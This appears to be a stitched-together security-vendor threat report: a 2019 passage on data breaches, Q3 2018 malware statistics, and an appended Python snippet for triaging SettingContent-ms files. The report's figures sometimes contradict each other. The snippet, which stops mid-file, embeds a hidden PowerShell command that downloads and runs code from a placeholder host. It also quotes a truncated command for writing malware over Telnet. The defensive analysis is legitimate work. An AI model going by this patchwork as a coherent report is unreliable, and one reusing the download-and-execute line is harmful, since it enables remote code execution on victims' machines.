We've become used to a steady stream of reports in the news about data breaches. Recent examples include the [theft of 23,205,290 email addresses](<https://www.forbes.com/sites/daveywinder/2019/08/05/cafepress-hacked-23m-accounts-compromised-is-yours-one-of-them/#625d70cf407e>) together with passwords weakly stored as base64-encoded SHA-1 hashes from CafePress.
Worryingly, the hack was reported by [Have I Been Pwned](<https://haveibeenpwned.com>) – CafePress didn't notify its customers until some months after the breach had occurred.

In August, two Israeli [researchers discovered fingerprints, facial recognition data and other personal information from the Suprema Biostar 2 biometric access control system in a publicly accessible database](<https://www.theguardian.com/technology/2019/aug/14/major-breach-found-in-biometrics-system-used-by-banks-uk-police-and-defence-firms>). The exposure of biometric data is of particular concern. If a hacker is able to obtain my password, I can change it, but a biometric is for life.

[Facebook has faced criticism on several occasions for failing to handle customers' data properly](<https://www.kaspersky.com/blog/facebook-10-fails/26980/>). In the latest of a long list of incidents, hundreds of millions of [phone numbers linked to Facebook accounts were found online](<https://techcrunch.com/2019/09/04/facebook-phone-numbers-exposed/?guccounter=1>) on a server that wasn't protected with a password. Each record contained a unique Facebook ID and the phone number listed on the account, leaving affected Facebook customers open to spam calls and SIM-swap attacks.

On September 12, mobile gaming company [Zynga reported that some player account data may have been accessed illegally by 'outside hackers'](<https://www.scmagazine.com/home/security-news/the-word-is-out-zynga-was-breached/>). Subsequently, a hacker going by the name of Gnosticplayers claimed to have breached the player database of _Words With Friends_, as well as data from _Draw Something_ and the discontinued game _OMGPOP_, exposing the data of more than 200 million Android and iOS players. While Zynga spotted the breach and notified customers, it's worrying that passwords were stored in cleartext.

Consumers have no direct control over the security of the personal data they disclose to online providers.
However, we can limit the damage of a security breach at an online provider by ensuring that the passwords we create are unique and hard to guess, or by using a password manager to do this for us. By making use of two-factor authentication, where offered by an online provider, we can further reduce the impact of any breach.

It's also worth bearing in mind that hacking the server of an online provider isn't the only way that cybercriminals can get their hands on passwords and other personal data. They also harvest data stored on a consumer's computer directly. This includes data stored in browsers, files from the hard disk, system data, account logins and more. Our data shows that 940,000 people were targeted by malware designed to steal such data in the first half of 2019. We would recommend using specialist software to store account passwords and bank card details, rather than relying on your browser. You can find out more about how cybercriminals target personal data on computers [here](<https://securelist.com/how-to-steal-a-million-of-your-data/91855/>).

_Source: "IT threat evolution Q3 2019", securelist.com, published 2019-11-29, https://securelist.com/it-threat-evolution-q3-2019/95268/_

_The following report (last seen 2018-11-30) references CVE-2017-11882, CVE-2018-0802, CVE-2018-8373, CVE-2018-8414 and CVE-2018-8440._

_These statistics are based on detection verdicts of Kaspersky Lab products received from users who consented to provide statistical data._

## Q3 figures

According to Kaspersky Security Network:

* Kaspersky Lab solutions blocked 947,027,517 attacks launched from online resources located in 203 countries.
* 246,695,333 unique URLs were recognized as malicious by Web Anti-Virus components.
* Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 305,315 users.
* Ransomware attacks were registered on the computers of 259,867 unique users.
* Our File Anti-Virus logged 239,177,356 unique malicious and potentially unwanted objects.
* Kaspersky Lab products for mobile devices detected:
  * 1,305,015 malicious installation packages
  * 55,101 installation packages for mobile banking Trojans
  * 13,075 installation packages for mobile ransomware Trojans.

## Mobile threats

### Q3 events

Perhaps the biggest news of the reporting period was the [Trojan-Banker.AndroidOS.Asacub](<https://securelist.com/the-rise-of-mobile-banker-asacub/87591/>) epidemic. It peaked in September when more than 250,000 unique users were attacked – and that only includes statistics for those with Kaspersky Lab's mobile products installed on their devices.

_Number of users attacked by the mobile banker Asacub in 2017 and 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09145748/it-threat-evolution-q3-2018-statistics_01.png>)

The scale of the attack involving Asacub by far surpasses the largest attacks we have previously observed while monitoring mobile threats. The Trojan's versions have sequential version numbers, suggesting the attacks were launched by just one threat actor. It's impossible to count the total number of affected users, but it would need to be in the tens of thousands to make such a massive malicious campaign profitable.
### Mobile threat statistics

In Q3 2018, Kaspersky Lab detected **1,305,015** malicious installation packages, which is 439,229 fewer packages than in the previous quarter.

_Number of detected malicious installation packages, Q3 2017 – Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09150155/it-threat-evolution-q3-2018-statistics_02.png>)

#### Distribution of detected mobile apps by type

Among all the threats detected in Q3 2018, the lion's share belonged to potentially unwanted RiskTool apps (52.05%); compared to the previous quarter, their share decreased by 3.3 percentage points (p.p.). Members of the RiskTool.AndroidOS.SMSreg family contributed most to this.

_Distribution of newly detected mobile apps by type, Q2 – Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/12081111/it-threat-evolution-q3-2018-statistics_03.png>)

Second place was occupied by Trojan-Dropper threats (22.57%), whose share increased by 9 p.p.
Most files of this type belonged to the Trojan-Dropper.AndroidOS.Piom, Trojan-Dropper.AndroidOS.Wapnor and Trojan-Dropper.AndroidOS.Hqwar families.

The share of advertising apps continued to decrease and accounted for 6.44% of all detected threats (compared to 8.91% in Q2 2018).

The statistics show that the number of mobile financial threats has been rising throughout 2018, with the proportion of mobile banker Trojans increasing from 1.5% in Q1 to 4.38% of all detected threats in Q3.

**TOP 20 mobile malware**

| | Verdicts* | %** |
|---|---|---|
| 1 | DangerousObject.Multi.Generic | 55.85 |
| 2 | Trojan.AndroidOS.Boogr.gsh | 11.39 |
| 3 | Trojan-Banker.AndroidOS.Asacub.a | 5.28 |
| 4 | Trojan-Banker.AndroidOS.Asacub.snt | 5.10 |
| 5 | Trojan.AndroidOS.Piom.toe | 3.23 |
| 6 | Trojan.AndroidOS.Dvmap.a | 3.12 |
| 7 | Trojan.AndroidOS.Triada.dl | 3.09 |
| 8 | Trojan-Dropper.AndroidOS.Tiny.d | 2.88 |
| 9 | Trojan-Dropper.AndroidOS.Lezok.p | 2.78 |
| 10 | Trojan.AndroidOS.Agent.rt | 2.74 |
| 11 | Trojan-Banker.AndroidOS.Asacub.ci | 2.62 |
| 12 | Trojan-Banker.AndroidOS.Asacub.cg | 2.51 |
| 13 | Trojan-Banker.AndroidOS.Asacub.ce | 2.29 |
| 14 | Trojan-Dropper.AndroidOS.Agent.ii | 1.77 |
| 15 | Trojan-Dropper.AndroidOS.Hqwar.bb | 1.75 |
| 16 | Trojan.AndroidOS.Agent.pac | 1.61 |
| 17 | Trojan-Dropper.AndroidOS.Hqwar.ba | 1.59 |
| 18 | Exploit.AndroidOS.Lotoor.be | 1.55 |
| 19 | Trojan.AndroidOS.Piom.uwp | 1.48 |
| 20 | Trojan.AndroidOS.Piom.udo | 1.36 |

_* This malware rating does not include potentially dangerous or unwanted programs such as RiskTool or adware._

_** Unique users attacked by the given malware as a percentage of all users of Kaspersky Lab's mobile antivirus that were attacked._

First place in our TOP 20 once again went to DangerousObject.Multi.Generic (55.85%), the verdict we use for malware that's detected [using cloud technologies](<https://www.kaspersky.com/enterprise-security/wiki-section/products/big-data-the-astraea-technology>).
Cloud technologies work when antivirus databases do not yet contain the data to detect a malicious program but the company's cloud antivirus database already includes information about the object. This is basically how the very latest malicious programs are detected.

In second place was Trojan.AndroidOS.Boogr.gsh (11.39%). This verdict is given to files that our system recognizes as malicious based on [machine learning](<https://www.kaspersky.com/enterprise-security/wiki-section/products/machine-learning-in-cybersecurity>).

Third and fourth places went to representatives of the Asacub mobile banker family – Trojan-Banker.AndroidOS.Asacub.a (5.28%) and Trojan-Banker.AndroidOS.Asacub.snt (5.10%).

#### Geography of mobile threats

_Map of attempted infections using mobile malware, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151353/it-threat-evolution-q3-2018-statistics_04_en.png>)

**TOP 10 countries by share of users attacked by mobile malware:**

| | Country* | %** |
|---|---|---|
| 1 | Bangladesh | 35.91 |
| 2 | Nigeria | 28.54 |
| 3 | Iran | 28.07 |
| 4 | Tanzania | 28.03 |
| 5 | China | 25.61 |
| 6 | India | 25.25 |
| 7 | Pakistan | 25.08 |
| 8 | Indonesia | 25.02 |
| 9 | Philippines | 23.07 |
| 10 | Algeria | 22.88 |

_* Countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000) are excluded._

_** Unique users attacked in the country as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._

In Q3 2018, Bangladesh (35.91%) retained first place in terms of the share of mobile users attacked. Nigeria (28.54%) came second. Third and fourth places were claimed by Iran (28.07%) and Tanzania (28.03%) respectively.

### Mobile banking Trojans

During the reporting period, we detected **55,101** installation packages for mobile banking Trojans, which is nearly 6,000 fewer than in Q2 2018.
The largest contribution was made by Trojans belonging to the family Trojan-Banker.AndroidOS.Hqwar.jck – this verdict was given to 35% of all detected banking Trojans. Trojan-Banker.AndroidOS.Asacub came second, accounting for 29%.

_Number of installation packages for mobile banking Trojans detected by Kaspersky Lab, Q3 2017 – Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09150645/it-threat-evolution-q3-2018-statistics_05.png>)

| | Verdicts | %* |
|---|---|---|
| 1 | Trojan-Banker.AndroidOS.Asacub.a | 33.27 |
| 2 | Trojan-Banker.AndroidOS.Asacub.snt | 32.16 |
| 3 | Trojan-Banker.AndroidOS.Asacub.ci | 16.51 |
| 4 | Trojan-Banker.AndroidOS.Asacub.cg | 15.84 |
| 5 | Trojan-Banker.AndroidOS.Asacub.ce | 14.46 |
| 6 | Trojan-Banker.AndroidOS.Asacub.cd | 6.66 |
| 7 | Trojan-Banker.AndroidOS.Svpeng.q | 3.25 |
| 8 | Trojan-Banker.AndroidOS.Asacub.cf | 2.07 |
| 9 | Trojan-Banker.AndroidOS.Asacub.bz | 1.68 |
| 10 | Trojan-Banker.AndroidOS.Asacub.bw | 1.68 |

_* Unique users attacked by the given malware as a percentage of all users of Kaspersky Lab's mobile antivirus that were attacked by banking threats._

In Q3 2018, the TOP 10 rating of banking threats was almost exclusively (nine places out of 10) occupied by various versions of Trojan-Banker.AndroidOS.Asacub.

_Geography of mobile banking threats, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151425/it-threat-evolution-q3-2018-statistics_06_en.png>)

**TOP 10 countries by share of users attacked by mobile banking Trojans:**

| | Country* | %** |
|---|---|---|
| 1 | Russia | 2.18 |
| 2 | South Africa | 2.16 |
| 3 | Malaysia | 0.53 |
| 4 | Ukraine | 0.41 |
| 5 | Australia | 0.39 |
| 6 | China | 0.35 |
| 7 | South Korea | 0.33 |
| 8 | Tajikistan | 0.30 |
| 9 | USA | 0.27 |
| 10 | Poland | 0.25 |

_* Countries where the number of users of Kaspersky Lab's mobile antivirus is relatively small (under 10,000) are excluded._

_** Unique users in the country attacked by mobile ransomware Trojans as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._

In Q3 2018, Russia ended up in first place in this TOP 10 because of the mass attacks involving the Asacub Trojan. The USA, the previous quarter's leader, fell to ninth (0.27%) in Q3. Second and third place were occupied by South Africa (2.16%) and Malaysia (0.53%) respectively.

### Mobile ransomware Trojans

In Q3 2018, we detected **13,075** installation packages for mobile ransomware Trojans, which is 1,044 fewer than in Q2.

_Number of installation packages for mobile ransomware Trojans detected by Kaspersky Lab, Q3 2017 – Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09150710/it-threat-evolution-q3-2018-statistics_07.png>)

| | Verdicts | %* |
|---|---|---|
| 1 | Trojan-Ransom.AndroidOS.Svpeng.ag | 47.79 |
| 2 | Trojan-Ransom.AndroidOS.Svpeng.ah | 26.55 |
| 3 | Trojan-Ransom.AndroidOS.Zebt.a | 6.71 |
| 4 | Trojan-Ransom.AndroidOS.Fusob.h | 6.23 |
| 5 | Trojan-Ransom.AndroidOS.Rkor.g | 5.50 |
| 6 | Trojan-Ransom.AndroidOS.Svpeng.snt | 3.38 |
| 7 | Trojan-Ransom.AndroidOS.Svpeng.ab | 2.15 |
| 8 | Trojan-Ransom.AndroidOS.Egat.d | 1.94 |
| 9 | Trojan-Ransom.AndroidOS.Small.as | 1.43 |
| 10 | Trojan-Ransom.AndroidOS.Small.cj | 1.23 |

_* Unique users attacked by the given malware as a percentage of all users of Kaspersky Lab's mobile antivirus attacked by ransomware Trojans._

In Q3 2018, the most widespread mobile ransomware Trojans belonged to the Svpeng family – Trojan-Ransom.AndroidOS.Svpeng.ag (47.79%) and Trojan-Ransom.AndroidOS.Svpeng.ah (26.55%). Together, they accounted for three quarters of all mobile ransomware Trojan attacks.
The once-popular families Zebt and Fusob were a distant third and fourth, represented by Trojan-Ransom.AndroidOS.Zebt.a (6.71%) and Trojan-Ransom.AndroidOS.Fusob.h (6.23%) respectively.

_Geography of mobile ransomware Trojans, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151458/it-threat-evolution-q3-2018-statistics_08_en.png>)

**TOP 10 countries by share of users attacked by mobile ransomware Trojans:**

| | Country* | %** |
|---|---|---|
| 1 | USA | 1.73 |
| 2 | Kazakhstan | 0.36 |
| 3 | China | 0.14 |
| 4 | Italy | 0.12 |
| 5 | Iran | 0.11 |
| 6 | Belgium | 0.10 |
| 7 | Switzerland | 0.09 |
| 8 | Poland | 0.09 |
| 9 | Mexico | 0.09 |
| 10 | Romania | 0.08 |

_* Countries where the number of users of Kaspersky Lab's mobile antivirus is relatively small (under 10,000) are excluded._

_** Unique users in the country attacked by mobile ransomware Trojans as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._

Just like in Q2, first place in the TOP 10 went to the United States (1.73%). Kazakhstan (0.6%) rose one place to second in Q3, while China (0.14%) rose from seventh to third.

## Attacks on IoT devices

In this quarter's report, we decided to only present the statistics for Telnet attacks, as this type of attack is used most frequently and employs the widest variety of malware types.
| Service | % |
|---|---|
| Telnet | 99.4% |
| SSH | 0.6% |

_The popularity of attacked services according to the number of unique IP addresses from which attacks were launched, Q3 2018_

### Telnet attacks

_Geography of IP addresses of devices from which attacks were attempted on Kaspersky Lab honeypots, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151529/it-threat-evolution-q3-2018-statistics_09_en.png>)

**TOP 10 countries hosting devices that were sources of attacks targeting Kaspersky Lab honeypots.**

| | Country | %* |
|---|---|---|
| 1 | China | 27.15% |
| 2 | Brazil | 10.57% |
| 3 | Russia | 7.87% |
| 4 | Egypt | 7.43% |
| 5 | USA | 4.47% |
| 6 | South Korea | 3.57% |
| 7 | India | 2.59% |
| 8 | Taiwan | 2.17% |
| 9 | Turkey | 1.82% |
| 10 | Italy | 1.75% |

_* Infected devices in each country as a percentage of the global number of IoT devices that attack via Telnet._

In Q3, China (23.15%) became the leader in terms of the number of unique IP addresses directing attacks against Kaspersky Lab honeypots. Brazil (10.57%) came second, after leading the rating in Q2. Russia (7.87%) was third.

Successful Telnet attacks saw the threat actors download Downloader.Linux.NyaDrop.b (62.24%) most often. This piece of malware is remarkable in that it contains shellcode that downloads other malware from the same source computer that has just infected the victim IoT device. The shellcode doesn't require any utilities – it performs all the necessary actions within itself using system calls. In other words, NyaDrop is a kind of universal soldier, capable of performing its tasks irrespective of the environment it has been launched in.

It was the Trojans of the family Backdoor.Linux.Hajime that downloaded NyaDrop most frequently, because this is a very convenient self-propagation method for Hajime. The flow chart in this case is of particular interest:

1. After successfully infecting a device, Hajime scans the network to find new victims.
2. As soon as a suitable device is found, the lightweight NyaDrop (just 480 bytes) is downloaded to it.
3. NyaDrop contacts the device that was the infection source and slowly downloads Hajime, which is much larger.

All these actions are only required because it's quite a challenge to download files via Telnet, though it is possible to execute commands. For example, this is what creating a NyaDrop file looks like (the command is shown truncated, as in the original report):

    echo -ne "\x7f\x45\x4c\x46\x01\x01\x01\x00\x00

480 bytes can be sent this way, but sending 60 KB becomes problematic.

**TOP 10 malware downloaded to infected IoT devices in successful Telnet attacks**

| | Verdicts | %* |
|---|---|---|
| 1 | Trojan-Downloader.Linux.NyaDrop.b | 62.24% |
| 2 | Backdoor.Linux.Mirai.ba | 16.31% |
| 3 | Backdoor.Linux.Mirai.b | 12.01% |
| 4 | Trojan-Downloader.Shell.Agent.p | 1.53% |
| 5 | Backdoor.Linux.Mirai.c | 1.33% |
| 6 | Backdoor.Linux.Gafgyt.ay | 1.15% |
| 7 | Backdoor.Linux.Mirai.au | 0.83% |
| 8 | Backdoor.Linux.Gafgyt.bj | 0.61% |
| 9 | Trojan-Downloader.Linux.Mirai.d | 0.51% |
| 10 | Backdoor.Linux.Mirai.bj | 0.37% |

_* Proportion of downloads of each specific malicious program to IoT devices in successful Telnet attacks as a percentage of all malware downloads in such attacks._

The rating did not differ much from the previous quarter: half the top 10 is occupied by different modifications of Mirai, which is the most widespread IoT malware program to date.

## Financial threats

### Q3 events

The banking Trojan DanaBot that was detected in Q2 continued to develop rapidly in Q3. A new modification included not only an updated C&C/bot communication protocol but also an extended list of organizations targeted by the malware.
Its prime targets in Q2 were located in Australia and Poland, but in Q3 organizations from Austria, Germany and Italy were also included.

To recap, DanaBot has a modular structure and is capable of loading extra modules to intercept traffic and steal passwords and crypto wallets. The Trojan spread via spam messages containing a malicious Office document, which subsequently loaded the Trojan's main body.

### Financial threat statistics

In Q3 2018, Kaspersky Lab solutions blocked attempts to launch one or more malicious programs designed to steal money from bank accounts on the computers of 305,315 users.

_Number of unique users attacked by financial malware, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151555/it-threat-evolution-q3-2018-statistics_10_en.png>)

#### Geography of attacks

To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, we calculated the share of users of Kaspersky Lab products in each country that faced this threat during the reporting period out of all users of our products in that country.

_Geography of banking malware attacks, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151629/it-threat-evolution-q3-2018-statistics_11_en.png>)

**TOP 10 countries by percentage of attacked users**

| | Country* | %** |
|---|---|---|
| 1 | Germany | 3.0 |
| 2 | South Korea | 2.8 |
| 3 | Greece | 2.3 |
| 4 | Malaysia | 2.1 |
| 5 | Serbia | 2.0 |
| 6 | United Arab Emirates | 1.9 |
| 7 | Portugal | 1.9 |
| 8 | Lithuania | 1.9 |
| 9 | Indonesia | 1.8 |
| 10 | Cambodia | 1.8 |

_* Countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000) are excluded._

_** Unique users attacked by mobile banking Trojans in the country as a percentage of all users of Kaspersky Lab's mobile antivirus in that country._

**TOP 10 banking malware families**

| | Name | Verdicts | %* |
|---|---|---|---|
| 1 | Zbot | Trojan.Win32.Zbot | 25.8 |
| 2 | Nymaim | Trojan.Win32.Nymaim | 18.4 |
| 3 | SpyEye | Backdoor.Win32.SpyEye | 18.1 |
| 4 | RTM | Trojan-Banker.Win32.RTM | 9.2 |
| 5 | Emotet | Backdoor.Win32.Emotet | 5.9 |
| 6 | Neurevt | Trojan.Win32.Neurevt | 4.7 |
| 7 | Tinba | Trojan-Banker.Win32.Tinba | 2.8 |
| 8 | NeutrinoPOS | Trojan-Banker.Win32.NeutrinoPOS | 2.4 |
| 9 | Gozi | Trojan.Win32.Gozi | 1.6 |
| 10 | Trickster | Trojan.Win32.Trickster | 1.4 |

_* Unique users attacked by the given malware as a percentage of all users that were attacked by banking threats._

In Q3 2018, there were three newcomers to this TOP 10: Trojan.Win32.Trickster (1.4%), Trojan-Banker.Win32.Tinba (2.8%) and Trojan-Banker.Win32.RTM (9.2%). The latter shot to fourth place thanks to a mass mailing campaign in mid-July that involved emails with malicious attachments and links.

Overall, the TOP 3 remained the same, though Trojan.Win32.Nymaim ceded some ground – from 27% in Q2 to 18.4% in Q3 – and fell to second.

## Cryptoware programs

### Q3 events

In early July, Kaspersky Lab experts detected an unusual modification of the notorious Rakhni Trojan. What drew the analysts' attention was that in some cases the downloader now delivers a [miner](<https://securelist.com/to-crypt-or-to-mine-that-is-the-question/86307/>) instead of ransomware, as was always the case with this malware family in the past.

August saw the detection of the rather unusual [KeyPass](<https://securelist.com/keypass-ransomware/87412/>) ransomware. Its creators apparently decided to make provisions for all possible infection scenarios – via spam, with the help of exploit packs, and via manual brute-force attacks on the passwords of the remote access system, after which the Trojan is launched.
The KeyPass Trojan can run in both hidden mode and GUI mode so the threat actor can configure encryption parameters.\n\nMeanwhile, law enforcement agencies continue their systematic battle against ransomware. Following several years of investigations, two cybercriminals who distributed the [CoinVault](<https://securelist.com/coinvault-are-we-reaching-the-end-of-the-nightmare/72187/>) ransomware [were found guilty](<https://securelist.com/coinvault-the-court-case/86503/>) in the Netherlands.\n\n### Statistics\n\n#### Number of new modifications\n\nIn Q3, the number of detected cryptoware modifications was significantly lower than in Q2 and close to that of Q1.\n\n_ Number of new cryptoware modifications, Q4 2017 \u2013 Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151203/it-threat-evolution-q3-2018-statistics_12.png>)\n\n#### Number of users attacked by Trojan cryptors\n\nIn Q3 2018, Kaspersky Lab products protected 259,867 unique KSN users from Trojan cryptors. The total number of attacked users rose both against Q2 and on a month-on-month basis during Q3. 
In September, we observed a significant rise in the number of attempted infections, which appears to correlate with people returning from seasonal vacations.\n\n_Number of unique users attacked by Trojan cryptors, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151654/it-threat-evolution-q3-2018-statistics_13_en.png>)\n\n#### Geography of attacks\n\n_Geography of Trojan cryptors attacks, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151726/it-threat-evolution-q3-2018-statistics_14_en.png>)\n\n**TOP 10 countries attacked by Trojan cryptors**\n\n| Country* | %** \n---|---|--- \n1 | Bangladesh | 5.80 \n2 | Uzbekistan | 3.77 \n3 | Nepal | 2.18 \n4 | Pakistan | 1.41 \n5 | India | 1.27 \n6 | Indonesia | 1.21 \n7 | Vietnam | 1.20 \n8 | Mozambique | 1.06 \n9 | China | 1.05 \n10 | Kazakhstan | 0.84 \n \n_* Countries with relatively few Kaspersky Lab users (under 50,000) are excluded._ \n_** Unique users whose computers were attacked by Trojan cryptors as a percentage of all unique users of Kaspersky Lab products in that country._\n\nMost of the places in this rating are occupied by Asian countries. Bangladesh tops the list with 5.8%, followed by Uzbekistan (3.77%) and the newcomer Nepal (2.18%) in third. 
Pakistan (1.41%) came fourth, while China (1.05%) fell from sixth to ninth and Vietnam (1.20%) fell four places to seventh.\n\n**TOP 10 most widespread cryptor families**\n\n| Name | Verdicts | %* \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 28.72% \n2 | (generic verdict) | Trojan-Ransom.Win32.Phny | 13.70% \n3 | GandCrab | Trojan-Ransom.Win32.GandCrypt | 12.31% \n4 | Cryakl | Trojan-Ransom.Win32.Cryakl | 9.30% \n5 | (generic verdict) | Trojan-Ransom.Win32.Gen | 2.99% \n6 | (generic verdict) | Trojan-Ransom.Win32.Cryptor | 2.58% \n7 | PolyRansom/VirLock | Virus.Win32.PolyRansom | 2.33% \n8 | Shade | Trojan-Ransom.Win32.Shade | 1.99% \n9 | Crysis | Trojan-Ransom.Win32.Crusis | 1.70% \n10 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 1.70% \n \n_* Unique Kaspersky Lab users attacked by a specific family of Trojan cryptors as a percentage of all users attacked by Trojan cryptors._\n\nThe leading 10 places are increasingly occupied by generic verdicts, suggesting widespread cryptors are effectively detected by automatic intelligent systems. WannaCry (28.72%) still leads the way among specific cryptoware families. This quarter saw two new versions of the Trojan GandCrab (12.31%) emerge, meaning it remained in the most widespread ransomware rating. Among the old-timers that remained in the TOP 10 were PolyRansom, Cryakl, Shade, and Crysis, while Cerber and Purgen failed to gain much distribution this quarter.\n\n## Cryptominers\n\n_As we already reported in [Ransomware and malicious cryptominers in 2016-2018](<https://securelist.com/ransomware-and-malicious-crypto-miners-in-2016-2018/86238/>), ransomware is gradually declining and being replaced with cryptocurrency miners. Therefore, this year we decided to start publishing quarterly reports on the status of this type of threat. 
At the same time, we began using a broader range of verdicts as a basis for collecting statistics on miners, so the statistics in this year's quarterly reports may not be consistent with the data from our earlier publications. _\n\n### Statistics\n\n#### Number of new modifications\n\nIn Q3 2018, Kaspersky Lab solutions detected 31,991 new modifications of miners.\n\n_Number of new miner modifications, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151750/it-threat-evolution-q3-2018-statistics_15_en.png>)\n\n#### Number of users attacked by cryptominers\n\nIn Q3, Kaspersky Lab products detected mining programs on the computers of 1,787,994 KSN users around the world.\n\n_Number of unique users attacked by cryptominers, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151816/it-threat-evolution-q3-2018-statistics_16_en.png>)\n\nCryptomining activity in September was comparable to that of June 2018, though we observed an overall downward trend in Q3.\n\n#### Geography of attacks\n\n_Geography of cryptominers, Q3 2018 (download)_\n\n**TOP 10 countries by percentage of attacked users**\n\n| Country* | %** \n---|---|--- \n1 | Afghanistan | 16.85% \n2 | Uzbekistan | 14.23% \n3 | Kazakhstan | 10.17% \n4 | Belarus | 9.73% \n5 | Vietnam | 8.96% \n6 | Indonesia | 8.80% \n7 | Mozambique | 8.50% \n8 | Ukraine | 7.60% \n9 | Tanzania | 7.51% \n10 | Azerbaijan | 7.13% \n \n_* Countries with relatively few Kaspersky Lab product users (under 50,000) are excluded._ \n_** Unique Kaspersky Lab users whose computers were targeted by miners as a percentage of all unique users of Kaspersky Lab products in the country._\n\n## Vulnerable apps used by cybercriminals\n\nThe distribution of platforms most often targeted by exploits showed very little change from Q2. 
Microsoft Office applications (70%) are still the most frequently targeted \u2013 five times more than web browsers, the second most attacked platform.\n\nAlthough quite some time has passed since security patches were released for the two vulnerabilities most often used in cyberattacks \u2013 CVE-2017-11882 and CVE-2018-0802 \u2013 the exploits targeting the Equation Editor component still remain the most popular for sending malicious spam messages.\n\nAn exploit targeting the vulnerability [CVE-2018-8373](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8373>) in the VBScript engine (which was patched in late August) was detected in the wild and affected Internet Explorer 9\u201311. However, we are currently observing only limited use of this vulnerability by cybercriminals. This is most probably due to Internet Explorer not being very popular, as well as the fact that VBScript execution is disabled by default in recent versions of Windows 10.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151232/it-threat-evolution-q3-2018-statistics_18.png>)\n\nQ3 was also marked by the emergence of two atypical 0-day vulnerabilities \u2013 [CVE-2018-8414](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-8414>) and [CVE-2018-8440](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8440>). 
They are peculiar because information about the existence of these vulnerabilities, along with detailed descriptions and all the files required to reproduce them, was leaked to the public domain long before official patches were released for them.\n\nIn the case of CVE-2018-8414, [an article](<https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39>) was published back in June with a detailed description of how SettingContent-ms files can be used to execute arbitrary code in Windows. However, the security patch to fix this vulnerability was only released in Q3, two months after the article became publicly available, by which time active exploitation of the vulnerability had already begun. The researchers who described this technique reported it to Microsoft, but initially it was not recognized as a vulnerability requiring a patch. Microsoft reconsidered after cybercriminals began actively using these files to deliver malicious payloads, and a patch was released on August 14. According to KSN statistics, the SettingContent-ms files didn't gain much popularity among cybercriminals, and after the security patch was released, their use ceased altogether. \n\nAnother interesting case was the CVE-2018-8440 vulnerability. Just like in the case above, all the information required for reproduction was deliberately published by a researcher, and threat actors naturally took advantage. CVE-2018-8440 is a privilege-escalation vulnerability, allowing an attacker to escalate their privileges in the system to the highest level \u2013 System. The vulnerability is based on how Windows processes a task scheduler advanced local procedure call (ALPC). The vulnerable ALPC procedure makes it possible to change the discretionary access control list (DACL) for files located in a directory that doesn't require special privileges to access. 
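CVE-2018-8414 comes down to the `<DeepLink>` element of a .SettingContent-ms file being handed to the shell for execution when the file is opened, so the natural triage step for a defender is to parse such files and check where the deep link points. The Python below is an added example, not code from Kaspersky or from the SpecterOps write-up linked above. Both sample files are constructed here (the benign one follows the Control Panel shortcut layout of a stock Windows 10 file, the malicious one swaps the deep link for a command line with a placeholder URL), the allow-list of expected DeepLink targets and the interpreter list are assumptions to tune per environment, and the namespace matching is deliberately lax so the parser does not depend on the exact schema URI:

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample: a legitimate Windows 10 SettingContent-ms shortcut.
# The DeepLink launches the Control Panel and nothing else.
BENIGN_SAMPLE = """<?xml version="1.0" encoding="UTF-8"?>
<PCSettings>
  <SearchableContent xmlns="http://schemas.microsoft.com/Search/2013/SettingContent">
    <ApplicationInformation>
      <AppID>windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel</AppID>
      <DeepLink>%windir%\\system32\\control.exe</DeepLink>
      <Icon>%windir%\\system32\\control.exe</Icon>
    </ApplicationInformation>
    <SettingIdentity>
      <PageID></PageID>
      <HostID>{12B1697E-D3A0-4DBC-B568-CCF64A3F934D}</HostID>
    </SettingIdentity>
  </SearchableContent>
</PCSettings>
"""

# Constructed sample: the same file with the DeepLink replaced by a command line.
# The URL is a placeholder, not an indicator from any real campaign.
MALICIOUS_SAMPLE = BENIGN_SAMPLE.replace(
    "<DeepLink>%windir%\\system32\\control.exe</DeepLink>",
    "<DeepLink>%windir%\\system32\\cmd.exe /c powershell -nop -w hidden -c "
    "\"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage')\"</DeepLink>",
)

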